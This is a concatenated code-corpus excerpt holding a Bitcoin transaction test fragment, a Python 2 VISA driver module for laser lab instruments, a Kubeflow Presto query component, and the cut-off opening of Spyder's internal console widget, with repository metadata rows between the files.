        raw_tx = 'f0b47b9a01ecf5e5c3bbf2cf1f71ecdc7f708b0b222432e914b394e24aad1494a42990ddfc000000008b483045022100852744642305a99ad74354e9495bf43a1f96ded470c256cd32e129290f1fa191022030c11d294af6a61b3da6ed2c0c296251d21d113cfd71ec11126517034b0dcb70014104a0fe6e4a600f859a0932f701d3af8e0ecd4be886d91045f06a5a6b931b95873aea1df61da281ba29cadb560dad4fc047cf47b4f7f2570da4c0b810b3dfa7e500ffffffff0240420f00000000001976a9147eeacb8a9265cd68c92806611f704fc55a21e1f588ac05f00d00000000001976a914eb3bd8ccd3ba6f1570f844b59ba3e0a667024a6a88acff7f0000'
        txid = 'c659729a7fea5071361c2c1a68551ca2bf77679b27086cc415adeeb03852e369'
        self._run_naive_tests_on_tx(raw_tx, txid)
class NetworkMock(object):

    """Minimal stand-in for the network object used by the tests."""

    def __init__(self, unspent):
        self.unspent = unspent

    def synchronous_get(self, arg):
        # canned response, independent of the request
        response = self.unspent
        return response
| 62.622222 | 535 | 0.787935 |
92543c102b29da163c80ab76e4cfb18836472e06 | 20,647 | py | Python | meas/VECSELSetup.py | stefantkeller/VECSELsetup | c1740e170b54be40f7315808e451c0731a5d7f3b | [
"MIT"
] | null | null | null | meas/VECSELSetup.py | stefantkeller/VECSELsetup | c1740e170b54be40f7315808e451c0731a5d7f3b | [
"MIT"
] | null | null | null | meas/VECSELSetup.py | stefantkeller/VECSELsetup | c1740e170b54be40f7315808e451c0731a5d7f3b | [
"MIT"
] | null | null | null | #! /usr/bin/python2.7
# -*- coding: utf-8 -*-
'''
Note:
The objects defined in this file talk to the actual hardware.
If you are merely testing whether a measurement routine works in
principle, you do NOT want to import this module.
In that case, import 'VECSELSetupFake' instead: it provides mocks
that accept the same commands and act as if they were connected to
the hardware, without needing a working connection.
'''
from __future__ import division # old: int division (1/4=0); future: float division (1/4=0.25)
import time
import numpy as np
import visa # Virtual Instrument Software Architecture to control e.g. GPIB, RS232, USB, Ethernet
from pyvisa import constants as C
vparse = lambda s, n=1: str(s)[:-n] # visa queries end with '\n', we don't want that, hence omit the last character
class PowerMeter(object):

    """VISA wrapper around a power meter with an attached sensor head."""

    def __init__(self, resourcemanager, address):
        meter = resourcemanager.open_resource(address)
        meter.write(r'*CLS')  # clear status; all event registers and error queue
        # legacy setting, inherited from the .vi document passed down for generations
        meter.write(r'SENSE:POWER:AUTO ON')
        meter.write(r'SENS:AVERAGE 200')  # default averaging rate
        self._idn = vparse(meter.query(r'*IDN?'))  # identification code of the meter itself
        self._sens = vparse(meter.query(r'SYSTEM:SENSOR:IDN?'))  # id of the sensor attached
        self._pm = meter

    def __str__(self):
        return ';'.join([self._idn, self._sens])

    def get_statset(self):
        """Return a list of 'command=value' strings describing the current
        state -- information to save along with measurements (file header)."""
        info = [r'*IDN?={0}'.format(self._idn),
                r'SYSTEM:SENSOR:IDN?={0}'.format(self._sens)]
        # queries whose replies parse as numbers
        ascii_comands = [r'SENS:AVERAGE?',  # averaging rate
                         r'SENS:CORRECTION?',  # is there an attenuation factor?
                         #r'SENS:CORRECTION:BEAMDIAMETER?', # sensor aperture?
                         r'SENS:CORRECTION:WAVELENGTH?',  # operation wavelength
                         r'SENS:POWER:REF?',  # queries the delta reference value
                         r'SENS:POWER:REF:STATE?']  # queries the delta mode state
        # queries whose replies are plain strings
        nonascii_comands = [r'SENS:POWER:UNIT?',  # W or dBm
                            r'CONFIGURE?']  # current measurement configuration (a power meter should read POW)
        info.extend(cmd + '={0}'.format(self._pm.query_ascii_values(cmd)[0])
                    for cmd in ascii_comands)
        info.extend(cmd + '={0}'.format(vparse(self._pm.query(cmd)))
                    for cmd in nonascii_comands)
        return info

    def average_over(self, N=1):
        """Set the averaging rate and return the value actually in effect.

        According to the specs one sample takes approx 3 ms.
        """
        self._pm.write(r'SENS:AVERAGE {0}'.format(N))
        return self._pm.query_ascii_values(r'SENS:AVERAGE?')[0]

    def set_wavelength(self, lambd=1270):
        """Set the correction wavelength (in nm!) and return the value read back."""
        self._pm.write(r'SENS:CORRECTION:WAVELENGTH {0}'.format(lambd))
        return self._pm.query_ascii_values(r'SENS:CORRECTION:WAVELENGTH?')[0]

    def measure(self, timed=True):
        """Take one power reading.

        With timed=True, return (value, elapsed seconds for the query);
        otherwise return the value alone.
        """
        if not timed:
            return self._pm.query_ascii_values(r'MEASURE?')[0]
        start = time.time()
        return self._pm.query_ascii_values(r'MEASURE?')[0], time.time() - start
class PowerSource(object):

    """Laser diode driver (LDC 1000) controlled over RS-232 via VISA.

    Safety notes: the maximum current is clamped by ``_curr_max``; every
    error path calls close(), which sets the current to 0 before
    releasing the serial port. The device replies with inconsistent
    combinations of \\r and \\n, so replies are always read raw.
    """

    def __init__(self, resourcemanager, address):
        self._termination_char = u'\r'  # \r or \n; for writing; \n seems not to work?!
        self._query_delay = 0.1  # time in s between write and read when query
        self._read_n = 500  # read raw so many bytes (or until machine sends nothing new anymore... 500 is way more than enough.)
        self._curr_max = 0.5  # safety measure, max allowed current (in A)
        self._delay_set_current = 2  # s; to wait between setting current and reading actually achieved value
        _ps = resourcemanager.open_resource(address)
        _ps = self._set_attributes(_ps)
        self._ps = _ps
        self._write('set ERR 0')  # clear whatever was in the pipe before
        self._write('set LMO 0')  # laser mode: CW
        self.set_current(0)  # cancel whatever was on last at everytime we init the source
        lcl = self.set_max_current(self._curr_max)
        #print lcl
        self._port = _ps.resource_info[0].alias
        self._name = _ps.resource_info[0].resource_name

    def _set_attributes(self, _ps):
        # find name and flag of attributes with
        # "All Programs -> National Instruments -> VISA -> VISA Interactive Control"
        # here following the set attributes found with this app
        # if it works: accept the black magic and don't change anything!
        # if it doesn't... well... I hope you have no plans tonight
        #
        # the first settings come from the manual:
        # laser-electronics.de, Laser Diode Control LDC 1000, Operating Instructions
        _ps.set_visa_attribute(C.VI_ATTR_ASRL_BAUD, 9600)  # baud rate
        _ps.set_visa_attribute(C.VI_ATTR_ASRL_DATA_BITS, 8)
        _ps.set_visa_attribute(C.VI_ATTR_ASRL_PARITY, 0)  # 0 := none
        _ps.set_visa_attribute(C.VI_ATTR_ASRL_STOP_BITS, 10)  # 10 = 1
        _ps.set_visa_attribute(C.VI_ATTR_TMO_VALUE, 2000)  # 2000 ms timeout
        #_ps.query_delay = 0.1 # time in s between write and read when query
        if self._termination_char == u'\r':
            _ps.set_visa_attribute(C.VI_ATTR_TERMCHAR, int(u'0xD', base=16))  # end lines with \n (=0xA) or \r (=0xD)
        elif self._termination_char == u'\n':  # bugfix: was a bare (undefined) name, raising NameError
            _ps.set_visa_attribute(C.VI_ATTR_TERMCHAR, int(u'0xA', base=16))  # end lines with \n (=0xA) or \r (=0xD)
        else:
            raise NotImplementedError(r'As termination character choose either \n or \r; support for custom termination is not implemented.')
        _ps.write_termination = self._termination_char
        _ps.set_visa_attribute(C.VI_ATTR_TERMCHAR_EN, C.VI_TRUE)  # enable termchar
        _ps.set_visa_attribute(C.VI_ATTR_ASRL_END_IN, C.VI_ASRL_END_TERMCHAR)  # end mode for reads (not clear whether 'read' by us or the machine)
        _ps.set_visa_attribute(C.VI_ATTR_IO_PROT, C.VI_PROT_NORMAL)  # VI_PROT_NORMAL or VI_PROT_4882_STR
        # from partially working LabView vi:
        _ps.set_visa_attribute(C.VI_ATTR_ASRL_FLOW_CNTRL, C.VI_ASRL_FLOW_XON_XOFF)
        _ps.set_visa_attribute(C.VI_ATTR_ASRL_XON_CHAR, 17)  # no explanation for the value
        _ps.set_visa_attribute(C.VI_ATTR_ASRL_XOFF_CHAR, 19)  # same
        _ps.set_visa_attribute(C.VI_ATTR_ASRL_DTR_STATE, C.VI_STATE_UNASSERTED)
        _ps.set_visa_attribute(C.VI_ATTR_ASRL_RTS_STATE, C.VI_STATE_ASSERTED)
        # attributes of unknown importance and actual meaning:
        _ps.set_visa_attribute(C.VI_ATTR_DMA_ALLOW_EN, C.VI_FALSE)
        _ps.set_visa_attribute(C.VI_ATTR_SUPPRESS_END_EN, C.VI_FALSE)
        _ps.set_visa_attribute(C.VI_ATTR_FILE_APPEND_EN, C.VI_FALSE)
        _ps.set_visa_attribute(C.VI_ATTR_ASRL_REPLACE_CHAR, int(u'0x0', base=16))  # sth with error handling
        _ps.set_visa_attribute(C.VI_ATTR_ASRL_DISCARD_NULL, C.VI_FALSE)
        _ps.set_visa_attribute(C.VI_ATTR_ASRL_BREAK_LEN, 250)
        _ps.set_visa_attribute(C.VI_ATTR_ASRL_ALLOW_TRANSMIT, C.VI_TRUE)
        _ps.set_visa_attribute(C.VI_ATTR_ASRL_BREAK_STATE, C.VI_STATE_UNASSERTED)
        #_ps.set_visa_attribute(C.VI_ATTR_ASRL_WIRE_MODE,C.VI_ASRL_232_DTE) # doesn't exist
        # read only(?)
        #_ps.set_visa_attribute(C.VI_ATTR_ASRL_CTS_STATE,C.VI_STATE_UNASSERTED)
        #_ps.set_visa_attribute(C.VI_ATTR_ASRL_DCD_STATE,C.VI_STATE_UNASSERTED)
        #_ps.set_visa_attribute(C.VI_ATTR_ASRL_DSR_STATE,C.VI_STATE_UNASSERTED)
        #_ps.set_visa_attribute(C.VI_ATTR_ASRL_RI_STATE,C.VI_STATE_UNASSERTED)
        # enable reading when received termination character
        # doesn't work because device sends inconsistent combinations of \n and \r
        # .. read raw!
        #_ps.set_visa_attribute(C.VI_ATTR_SEND_END_EN,C.VI_TRUE)
        #_ps.read_termination = self._termination_char # this machine returns random terminations: \r and \n mixed. read it "raw" and parse it from there!
        #_ps.set_visa_attribute(C.VI_ATTR_ASRL_END_OUT,C.VI_ASRL_END_TERMCHAR) #end mode for writes
        return _ps

    def get_statset(self):
        """Return a list of 'key=value' strings about the current state --
        stuff that belongs in a file header."""
        info = [r'alias={0}'.format(self._port), r'resource_name={0}'.format(self._name)]
        info.append(r'delay_set_current={0}'.format(self._delay_set_current))
        info.append(r'LMO={0}'.format(self._query('get LMO')))
        info.append(r'LCL={0}'.format(self._query('get LCL')))
        info.append(r'AT1={0}'.format(self._query('get AT1').replace('\xb0', '')))  # strip the degree sign
        info.append(r'baudrate={0}'.format(self._ps.get_visa_attribute(C.VI_ATTR_ASRL_BAUD)))
        info.append(r'data_bits={0}'.format(self._ps.get_visa_attribute(C.VI_ATTR_ASRL_DATA_BITS)))
        info.append(r'parity={0}'.format(self._ps.get_visa_attribute(C.VI_ATTR_ASRL_PARITY)))
        info.append(r'stop_bits={0}'.format(self._ps.get_visa_attribute(C.VI_ATTR_ASRL_STOP_BITS)))
        info.append(r'timeout={0}'.format(self._ps.get_visa_attribute(C.VI_ATTR_TMO_VALUE)))
        info.append(r'ERR={0}'.format(self._query('get ERR')))
        # sanitize entries
        info = [i.replace('\n', '') for i in info]
        info = [i.replace('\r', '') for i in info]
        return info

    def __str__(self):
        return ';'.join([self._port, self._name])

    def _query(self, msg):
        # write, wait, then read the raw reply (terminations are inconsistent)
        self._ps.write(unicode(msg))
        time.sleep(self._query_delay)
        return self._ps.read_raw(self._read_n)

    def _write(self, msg):
        time.sleep(self._query_delay)  # give it time to process the old orders.
        self._ps.write(unicode(msg))

    def close(self):
        """Set the current to 0 and release the serial port.

        Whatever happens in here must be safe: a write may fail but any
        such error is held back in the buffer (query('get ERR') to see).
        Do NOT query in here; a 'read' MAY cause a problem.
        """
        self._write('set SLC 0')
        self._ps.close()

    def on(self):
        """Open the shutter to turn the laser on; returns the previous state."""
        err = self.read_error()
        state = float(self._query('get LAS'))
        if state == 0 and err == 0:  # device currently off
            self._write('set LAS')  # toggle 'on'
        elif state != 1:  # if not off, it's on, nothing to toggle; however, if parsing results something strange turn off power
            self.close()
            raise visa.VisaIOError('Received unexpected state while turning laser ON: {0}'.format(state))
        elif err != 0:
            self.close()
            raise visa.VisaIOError('An unresolved error prevents me from turning the laser on: {0}'.format(err))
        return state

    def off(self):
        """Set current to 0 and close the shutter; returns the previous state."""
        self.set_current(0)
        state = float(self._query('get LAS'))
        if state == 1:  # device currently on
            self._write('set LAS')  # toggle 'off'
        elif state != 0:  # if not on, it's off, nothing to toggle; however, if parsing results something strange report!
            self.close()
            raise visa.VisaIOError('Received unexpected state while turning laser OFF: {0}'.format(state))
        return state

    def set_max_current(self, maxcurr=0):
        """Set the current limit (in A) and return the limit read back."""
        self._curr_max = maxcurr
        self._write('set LCL {0}A'.format(maxcurr))
        time.sleep(self._query_delay)
        return self._query('get LCL')

    def set_current(self, curr=0):
        """Set the laser current (clamped to the max) and return the value
        actually achieved (actual and set may differ a bit).

        If anything goes wrong the port is closed (which zeroes the
        current) and the causing error is raised again.
        """
        try:
            curr = np.min([self._curr_max, curr])  # never exceed the safety limit
            self._write('set SLC {0}'.format(curr))
            time.sleep(self._query_delay)  # regular delay
            time.sleep(self._delay_set_current)  # give it time to actually set the current
            ans = self.read_current()
            return float(ans.split(' ')[0])
        except Exception as e:
            # whatever you have in here must be safe!
            # don't call self.off(): it calls set_current(0) and goes in recursion limbo
            self.close()
            raise Exception(e)

    def read_current(self):
        """Return the raw reply of the actual laser current query."""
        try:
            return self._query('get ALC')
        except visa.VisaIOError as e:  # includes timeout errors
            self.close()
            raise visa.VisaIOError(e)

    def read_power_internal(self):
        """Return the device's own power reading.
        Do NOT rely on this reading though! (from old calibration...)"""
        try:
            return self._query('get ALP')
        except visa.VisaIOError as e:  # includes timeout errors
            self.close()
            raise visa.VisaIOError(e)

    def read_error(self):
        """Return the device error register as a float.

        In case error reads 'rs232 time out error0': origin unknown, it
        has always gone away after retrying; one suspicion is two write
        commands right after each other, hence the delay in _write().
        """
        try:
            err = float(self._query('get ERR'))
            return err
        except ValueError as e:
            # err responds with something unreadable or at least not a number.
            self.close()
            raise ValueError(e)

    def read_cooler(self):
        """Return the cooler temperature in deg C.
        AT1 and AT2 exist; however, only AT1 is active."""
        try:
            temp = self._query('get AT1')  # e.g. '\n19.9 \xb0C\r'
            return float(temp.split(' ')[0])
        except ValueError as e:
            self.close()
            raise ValueError(e)

    '''def set_cooler(self, temp):
        self._write('set ST1 {0}'.format(temp))'''
class SpectroMeter(object):
    """Optical spectrum analyzer driven over GPIB (HP/Agilent-style command set).

    Note: the OSA is case sensitive. Queries insert a short delay between
    write and read (`_query_delay`) because the instrument needs time to
    process each command.
    """
    def __init__(self, resourcemanager, address):
        self._query_delay = 0.1  # time in s between write and read when querying
        # Read up to this many raw bytes (or until the machine sends nothing
        # new anymore; 4096 is overkill, but a measurement sends many bytes).
        self._read_n = 4096
        _osa = resourcemanager.open_resource(address)
        _osa = self._set_attributes(_osa)
        self._osa = _osa
        # Instrument preset (IP): all functions to their default state
        # (including clearing the error register).
        self._write('IP;')
        self._write('LG;')  # set amplitude scale to logarithmic (for linear: LN)
        self._res_name = _osa.resource_info[0].resource_name
        self._dev_name = vparse(self._query('ID?'))  # see also CONFIG?
    def _set_attributes(self, _osa):
        """Apply the VISA session attributes the device is known to work with."""
        # Default values with which it worked; set explicitly to be sure.
        _osa.set_visa_attribute(C.VI_ATTR_TMO_VALUE, 3000)  # 3000 ms is already standard
        _osa.set_visa_attribute(C.VI_ATTR_TERMCHAR_EN, C.VI_FALSE)
        _osa.set_visa_attribute(C.VI_ATTR_SEND_END_EN, C.VI_TRUE)
        # End lines with \n (=0xA); only option according to the Language Reference.
        _osa.set_visa_attribute(C.VI_ATTR_TERMCHAR, int(u'0xA', base=16))
        _osa.set_visa_attribute(C.VI_ATTR_FILE_APPEND_EN, C.VI_FALSE)
        _osa.set_visa_attribute(C.VI_ATTR_IO_PROT, 1)
        return _osa
    def get_statset(self):
        """Return info strings about the current state (file-header material)."""
        info = ['resource_name={0}'.format(self._res_name), 'ID?={0}'.format(self._dev_name)]
        info.append('AUNITS?={0}'.format(vparse(self._query('AUNITS?'))))  # DBM, DBMV, DBUV, V, W
        info.append('CENTERWL?={0}'.format(vparse(self._query('CENTERWL?'))))
        info.append('RB?(ResBandwidth)(nm)={0}'.format(vparse(self._query('RB?'))))
        info.append('RL?(ReferenceLevel)(dBm)={0}'.format(vparse(self._query('RL?'))))
        info.append('RLPOS?(PositionRL)={0}'.format(vparse(self._query('RLPOS?'))))  # no idea what it means
        info.append('ROFFSET?(dB)={0}'.format(vparse(self._query('ROFFSET?'))))
        # Note: SENS? results are always returned in dBm regardless of AUNITS.
        info.append('SENSitivity?(dBm)={0}'.format(vparse(self._query('SENS?'))))
        info.append('SPan?(nm)={0}'.format(vparse(self._query('SP?'))))  # SP = wstop - wstart
        return info
    def __str__(self):
        return ';'.join([self._res_name, self._dev_name])
    def _query(self, msg):
        """Write `msg`, wait `_query_delay`, then read the raw reply."""
        # Note: the OSA is case sensitive!
        self._osa.write(unicode(msg))
        time.sleep(self._query_delay)
        return self._osa.read_raw(self._read_n)
    def _write(self, msg):
        """Write `msg` after giving the device time to process prior orders."""
        # Note: the OSA is case sensitive!
        time.sleep(self._query_delay)
        self._osa.write(unicode(msg))
    def close(self):
        """Release the VISA session."""
        # Putting the OSA back to local operation (GPIB 'loc') should be
        # part of a regular close — TODO confirm and implement.
        self._osa.close()
    def set_sensitivity(self, sensitivity=None):
        """Optionally set, then read back, the sensitivity in dBm."""
        if sensitivity is not None:
            self._write('SENS {0}DBM'.format(sensitivity))
        # BUG FIX: the readback used 'SENS?'.format(sensitivity) — a no-op
        # .format() on a placeholder-free literal.
        return float(self._query('SENS?'))
    def set_wavelength_center(self, lambd):
        """Set the center wavelength (nm) and return the read-back value."""
        return float(self._query('CENTERWL {0}NM;CENTERWL?'.format(lambd)))
    def set_wavelength_span(self, span):
        """Set the wavelength span (nm), symmetric around CENTERWL.

        It's equal to SP = STOPWL - STARTWL.
        """
        return float(self._query('SP {0}NM;SP?'.format(span)))
    def read_wavelength_range(self):
        """Return [start, stop] wavelength of the current sweep."""
        return [float(self._query('STARTWL?')), float(self._query('STOPWL?'))]
    def measure(self, timed=True):
        """Request stored trace A in decimal format and return the samples.

        TDF [P,M,B,A,I] sets the output format (decimal, integer, binary,
        8-bit, other 8-bit); TRA? requests trace A (TRB/TRC also exist).
        When `timed`, also return the seconds the query took.
        (Removed a dead `t0 = time.time()` that was immediately overwritten.)
        """
        if timed:
            t0 = time.time()
            return self._query('TDF P;TRA?').split(','), time.time() - t0
        else:
            return self._query('TDF P;TRA?').split(',')
class HeatSink(object):
    """Newport TEC controller; the setpoint is changed manually by the operator."""
    def __init__(self, resourcemanager, address):
        device = resourcemanager.open_resource(address)
        device.write(r'*CLS')  # clear status: all event registers and the error queue
        # Identification code of the meter itself.
        self._idn = vparse(device.query(r'*IDN?'), 2)
        # Mode: ITE (TEC current), R (resistance/reference) or T (temperature).
        self._mode = vparse(device.query(r'TEC:MODE?'), 2)
        self._hs = device
    def __str__(self):
        return ';'.join([self._idn, self._mode])
    def set_temperature(self, T=None):
        """Prompt the operator to set T by hand, then read back the value."""
        if T is not None:
            raw_input('Set temperature MANUALLY and confirm: {0}'.format(T))
        return self.read_temperature()
    def read_temperature(self):
        """Return the controller temperature reading (TEC:T?)."""
        return self._hs.query_ascii_values(r'TEC:T?')[0]
    def close(self):
        """Release the VISA session."""
        self._hs.close()
#=======================================================================================
ResourceManager = lambda : visa.ResourceManager()
def main():
    # Bring-up / smoke-test script for this measurement rig: list the VISA
    # resources, open each instrument driver once and exercise the power
    # meter. Python 2 only (print statements, u'' literals).
    rm = visa.ResourceManager()
    print rm.list_resources(query=u'?*')
    """
    u'PXI5::1::INSTR' n/a
    u'PXI5::2::INSTR' frame grabber card: open NI-MAX to controll
    u'ASRL1::INSTR' power source, i.e. pump controll
    u'ASRL10::INSTR' n/a
    u'GPIB0::1::INSTR' Orion AD100 actuator
    u'GPIB0::2::INSTR' Orion Power Meter (n/a)
    u'GPIB0::4::INSTR' n/a
    u'GPIB0::5::INSTR' Newport TEC
    u'GPIB0::9::INSTR' spectrometer
    """
    # Open each driver against its fixed address on this rig; osa/ps/hs are
    # only opened here, not exercised further.
    osa = SpectroMeter(rm,u'GPIB0::9::INSTR')
    ps = PowerSource(rm,u'ASRL1::INSTR')
    hs = HeatSink(rm,u'GPIB0::5::INSTR')
    pm = PowerMeter(rm,u'USB0::0x1313::0x8078::P0004893::INSTR')
    # Exercise the power meter: identity, settings, averaged and single reads.
    print pm
    print pm.get_statset()
    print pm.average_over(200)
    #print pm.set_wavelength(1270)
    print pm.measure()
if __name__ == '__main__': main()
| 46.087054 | 165 | 0.6368 |
319fee2009b78b5a9322d592f03bce777ef91de1 | 1,977 | py | Python | components/presto/query/src/program.py | Iuiu1234/pipelines | 1e032f550ce23cd40bfb6827b995248537b07d08 | [
"Apache-2.0"
] | 2,860 | 2018-05-24T04:55:01.000Z | 2022-03-31T13:49:56.000Z | components/presto/query/src/program.py | Iuiu1234/pipelines | 1e032f550ce23cd40bfb6827b995248537b07d08 | [
"Apache-2.0"
] | 7,331 | 2018-05-16T09:03:26.000Z | 2022-03-31T23:22:04.000Z | components/presto/query/src/program.py | Iuiu1234/pipelines | 1e032f550ce23cd40bfb6827b995248537b07d08 | [
"Apache-2.0"
] | 1,359 | 2018-05-15T11:05:41.000Z | 2022-03-31T09:42:09.000Z | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from pyhive import presto
def get_conn(host=None, catalog=None, schema=None, user=None, pwd=None):
    """Return an HTTPS connection to a Presto coordinator on port 443."""
    return presto.connect(
        host=host,
        port=443,
        protocol="https",
        catalog=catalog,
        schema=schema,
        username=user,
        password=pwd,
    )
def query(conn, query):
    """Execute *query* on *conn* and drain the result set.

    Fetched rows are intentionally discarded; the fetch just forces the
    statement to run to completion. Returns None.
    """
    cur = conn.cursor()
    cur.execute(query)
    cur.fetchall()
def main():
    """Parse CLI options, run the SQL statement on Presto, and record the
    component's output value in /output.txt (KFP convention)."""
    parser = argparse.ArgumentParser()
    parser.add_argument("--host", type=str, help="Presto Host.")
    # All remaining flags share type=str and required=True.
    for flag, help_text in (
        ("--catalog", "The name of the catalog."),
        ("--schema", "The name of the schema."),
        ("--query", "The SQL query statements to be executed in Presto."),
        ("--user", "The user of the Presto."),
        ("--pwd", "The password of the Presto."),
        ("--output", "The path or name of the emitted output."),
    ):
        parser.add_argument(flag, type=str, required=True, help=help_text)
    args = parser.parse_args()
    conn = get_conn(args.host, args.catalog, args.schema, args.user, args.pwd)
    query(conn, args.query)
    with open("/output.txt", "w+") as out_file:
        out_file.write(args.output)
if __name__ == "__main__":
    main()
| 26.013158 | 76 | 0.674254 |
bafc0c554f707c9d1f0aba12411100875fdb17b9 | 19,762 | py | Python | spyder/plugins/console/widgets/main_widget.py | mehrdad-shokri/spyder | 3bf92535cc52b030a4a2a089fc904f4cc835be5c | [
"MIT"
] | null | null | null | spyder/plugins/console/widgets/main_widget.py | mehrdad-shokri/spyder | 3bf92535cc52b030a4a2a089fc904f4cc835be5c | [
"MIT"
] | null | null | null | spyder/plugins/console/widgets/main_widget.py | mehrdad-shokri/spyder | 3bf92535cc52b030a4a2a089fc904f4cc835be5c | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Main Console widget.
"""
# pylint: disable=C0103
# pylint: disable=R0903
# pylint: disable=R0911
# pylint: disable=R0201
# Standard library imports
import logging
import os
import os.path as osp
import sys
# Third party imports
from qtpy.compat import getopenfilename
from qtpy.QtCore import Qt, Signal, Slot
from qtpy.QtWidgets import QInputDialog, QLineEdit, QMenu, QVBoxLayout
# Local imports
from spyder.api.plugins import (SpyderPlugin, SpyderPluginV2,
SpyderDockablePlugin)
from spyder.api.translations import get_translation
from spyder.api.widgets import PluginMainWidget
from spyder.app.solver import find_internal_plugins
from spyder.config.base import DEV, get_debug_level
from spyder.plugins.console.widgets.internalshell import InternalShell
from spyder.py3compat import to_text_string
from spyder.utils.environ import EnvDialog
from spyder.utils.misc import (get_error_match, getcwd_or_home,
remove_backslashes)
from spyder.utils.qthelpers import DialogManager, mimedata2url
from spyder.widgets.collectionseditor import CollectionsEditor
from spyder.widgets.findreplace import FindReplace
from spyder.widgets.reporterror import SpyderErrorDialog
# Localization
_ = get_translation('spyder')
logger = logging.getLogger(__name__)
# --- Constants
# ----------------------------------------------------------------------------
class ConsoleWidgetActions:
    """Identifiers for the QActions registered by ConsoleWidget.setup."""
    # Triggers
    Environment = 'environment_action'
    ExternalEditor = 'external_editor_action'
    MaxLineCount = 'max_line_count_action'
    Quit = 'quit_action'
    Run = 'run_action'
    SysPath = 'sys_path_action'
    # Toggles
    ToggleCodeCompletion = 'toggle_code_completion_action'
    ToggleWrap = 'toggle_wrap_action'
class ConsoleWidgetMenus:
    """Identifiers for the menus created by this widget."""
    InternalSettings = 'internal_settings_submenu'
class ConsoleWidgetOptionsMenuSections:
    """Section identifiers inside the widget's options menu."""
    Run = 'run_section'
    Quit = 'quit_section'
class ConsoleWidgetInternalSettingsSubMenuSections:
    """Section identifiers inside the internal-settings submenu."""
    Main = 'main'
# --- Widgets
# ----------------------------------------------------------------------------
class ConsoleWidget(PluginMainWidget):
    """Main widget of the internal console plugin: an InternalShell plus a
    find/replace bar, with actions, menus and error reporting around it."""
    # Default values for every option this widget reads with get_option().
    DEFAULT_OPTIONS = {
        'codecompletion/auto': True,
        'commands': [],
        'external_editor/gotoline': '',
        'external_editor/path': '',
        'max_line_count': 300,
        'message': 'Internal console\n\n',
        'multithreaded': False,
        'namespace': None,
        'profile': False,
        'show_internal_errors': True,
        'wrap': True,
        # From appearance
        'color_theme': 'spyder/dark',
    }
    # --- Signals
    # This signal emits a parsed error traceback text so we can then
    # request opening the file that traceback comes from in the Editor.
    sig_edit_goto_requested = Signal(str, int, str)
    # TODO: I do not think we use this?
    sig_focus_changed = Signal()
    # Emit this when the interpreter buffer is flushed
    sig_refreshed = Signal()
    # Request to show a status message on the main window
    # NOTE(review): this signal is declared but never emitted in this class;
    # __init__ emits sig_show_status_message instead — confirm which is live.
    sig_show_status_requested = Signal(str)
    # Request the main application to quit.
    sig_quit_requested = Signal()
    sig_help_requested = Signal(dict)
    """
    This signal is emitted to request help on a given object `name`.
    Parameters
    ----------
    help_data: dict
        Example `{'name': str, 'ignore_unknown': bool}`.
    """
    def __init__(self, name, plugin, parent=None, options=DEFAULT_OPTIONS):
        """Build the shell + find widget, lay them out and wire signals."""
        super().__init__(name, plugin, parent, options)
        logger.info("Initializing...")
        # Traceback MessageBox state: last traceback text and whether the
        # user chose to dismiss further error dialogs.
        self.error_traceback = ''
        self.dismiss_error = False
        # Widgets
        self.dialog_manager = DialogManager()
        self.error_dlg = None
        self.shell = InternalShell(  # TODO: Move to use SpyderWidgetMixin?
            parent=parent,
            namespace=self.get_option('namespace'),
            commands=self.get_option('commands'),
            message=self.get_option('message'),
            max_line_count=self.get_option('max_line_count'),
            profile=self.get_option('profile'),
            multithreaded=self.get_option('multithreaded'),
        )
        self.find_widget = FindReplace(self)
        # Setup
        self.setAcceptDrops(True)
        self.find_widget.set_editor(self.shell)
        self.find_widget.hide()
        self.shell.toggle_wrap_mode(self.get_option('wrap'))
        # Layout
        layout = QVBoxLayout()
        layout.addWidget(self.shell)
        layout.addWidget(self.find_widget)
        self.setLayout(layout)
        # Signals: forward the shell's signals to this widget's own.
        self.shell.sig_help_requested.connect(self.sig_help_requested)
        self.shell.sig_exception_occurred.connect(self.handle_exception)
        self.shell.sig_focus_changed.connect(self.sig_focus_changed)
        self.shell.sig_go_to_error_requested.connect(self.go_to_error)
        # NOTE(review): sig_redirect_stdio_requested is not declared in this
        # class — presumably inherited from PluginMainWidget; confirm.
        self.shell.sig_redirect_stdio_requested.connect(
            self.sig_redirect_stdio_requested)
        self.shell.sig_refreshed.connect(self.sig_refreshed)
        # NOTE(review): emits sig_show_status_message (presumably inherited),
        # not the locally declared sig_show_status_requested — confirm.
        self.shell.sig_show_status_requested.connect(
            lambda msg: self.sig_show_status_message.emit(msg, 0))
# --- PluginMainWidget API
# ------------------------------------------------------------------------
    def get_title(self):
        """Return the localized title shown on this dockable widget."""
        return _('Internal console')
    def setup(self, options):
        """Create this widget's actions and assemble its options menu.

        Part of the PluginMainWidget API; called once after construction.
        """
        # TODO: Move this to the shell
        quit_action = self.create_action(
            ConsoleWidgetActions.Quit,
            text=_("&Quit"),
            tip=_("Quit"),
            icon=self.create_icon('exit'),
            triggered=self.sig_quit_requested,
            context=Qt.ApplicationShortcut,
        )
        run_action = self.create_action(
            ConsoleWidgetActions.Run,
            text=_("&Run..."),
            tip=_("Run a Python script"),
            icon=self.create_icon('run_small'),
            triggered=self.run_script,
        )
        environ_action = self.create_action(
            ConsoleWidgetActions.Environment,
            text=_("Environment variables..."),
            tip=_("Show and edit environment variables (for current "
                  "session)"),
            icon=self.create_icon('environ'),
            triggered=self.show_env,
        )
        syspath_action = self.create_action(
            ConsoleWidgetActions.SysPath,
            text=_("Show sys.path contents..."),
            tip=_("Show (read-only) sys.path"),
            icon=self.create_icon('syspath'),
            triggered=self.show_syspath,
        )
        buffer_action = self.create_action(
            ConsoleWidgetActions.MaxLineCount,
            text=_("Buffer..."),
            tip=_("Set maximum line count"),
            triggered=self.change_max_line_count,
        )
        exteditor_action = self.create_action(
            ConsoleWidgetActions.ExternalEditor,
            text=_("External editor path..."),
            tip=_("Set external editor executable path"),
            triggered=self.change_exteditor,
        )
        # Checkable actions: toggling writes straight into the options.
        wrap_action = self.create_action(
            ConsoleWidgetActions.ToggleWrap,
